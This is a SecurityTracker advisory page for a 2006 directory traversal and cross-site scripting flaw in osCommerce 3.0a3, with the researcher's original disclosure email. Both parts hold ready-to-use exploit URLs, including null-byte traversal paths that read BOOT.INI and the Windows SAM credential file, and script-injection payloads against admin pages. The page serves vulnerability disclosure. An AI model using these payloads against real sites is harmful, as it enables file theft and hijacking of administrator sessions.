SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Commerce)  >  osCommerce Vendors:  osCommerce
osCommerce 'admin/templates_boxes_layout.php' Directory Traversal Bug Discloses Files to Remote Users
SecurityTracker Alert ID:  1017353
SecurityTracker URL:  http://securitytracker.com/id?1017353
CVE Reference:  CVE-2006-6533 ,  CVE-2006-6534   (Links to External Site)
Updated:  May 22 2008
Original Entry Date:  Dec 7 2006
Impact:  Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 3.0a3
Description:  Lostmon reported a vulnerability in osCommerce. A remote user can view files on the target system. A remote user can also conduct cross-site scripting attacks.

The 'admin/templates_boxes_layout.php' does not properly validate user-supplied input in the 'filter' parameter. A remote user can supply a specially crafted request to view files on target system.

Some demonstration exploit URLs are provided:

http://[target]/admin/templates_boxes_layout.php?se t=boxes&filter=../../our_evil_php_file&lID=27

http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../../../file.extension%00

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the osCommerce software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscr ipt%3Ealert('xss')%3C/script%3E

http://[target]/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT %3E

http://[target]/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://[target]/oscommerce /admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product

The original advisory is available at:

http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html
Impact:  A remote user can view files on the target system.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the osCommerce software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.oscommerce.com/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Lostmon <lostmon@gmail.com>
Message History:   None.

 Source Message Contents
Date:  Thu, 7 Dec 2006 10:31:42 +0100
From:  Lostmon <lostmon@gmail.com>
Subject:  Oscommerce 3.0a3 traversal arbitrary file access

 
############################################
Oscommerce traversal arbitrary file access
Vendor:http://www.oscommerce.com/about/news,125
Advisore:http://lostmon.blogspot.com/2006/12
/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
###########################################
 
osCommerce contains a flaw that allows a remote traversal
arbitrary file access.This flaw exists because the application
does not validate filter variable upon submission to
admin/templates_boxes_layout.php script.This could allow a
remote authenticated administrator to create a specially
crafted URL that would execute '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.
 
 
 
####################
versions
####################
 
Oscommerce 3.0a3
 
 
###################
SOLUTION
###################
 
No solution was available at this time.
 
 
################
timeline
################
 
Discovered:11-11-2006
vendor notify:-----
vendor response:----
disclosure:07-12-2006
 
#################
Examples
#################
 
######################
traversal file access
######################
 
wen we try to open
 
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=[SOME WORD]&lID=27
 
the aplication returns a full path disclosure and
returns this error:
 
Warning: require(includes/templates/[SOME WORD].php) [function.require]:
failed to open stream: No such file or directory in C:\AppServ\www\
oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13
 
Fatal error: require() [function.require]: Failed opening required
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_
boxes_layout.php on line 13
 
the aplication add the .php extension to our [SOME WORD] ummm
and it searh for the file in a folder inside webserver
we can include any php file located on the web server
in the aplication and it is executed(local file inclusion)
 
http://[victim]/admin/templates_boxes_layout.php?
set=boxes&filter=../../our_evil_php_file&lID=27
 
if we try to read a file outside webserver folder with a non php
extension can try for test this...
 
&filter=../../../../file.extension%00 for look for example boot.ini
in a windows system
 
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=../../../../BOOT.INI%00&lID=27
 
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=content&filter=../../../../windows/repair/sam%00&lID=27
 
#####################
Cross site scripting
#####################
 
http://localhost/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
 
http://localhost/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
 
http://localhost/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
 
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
 
 
######################## €nd #####################
 
Thnx to Estrella to be my ligth.
 
-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
-- 
La curiosidad es lo que hace mover la mente....


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC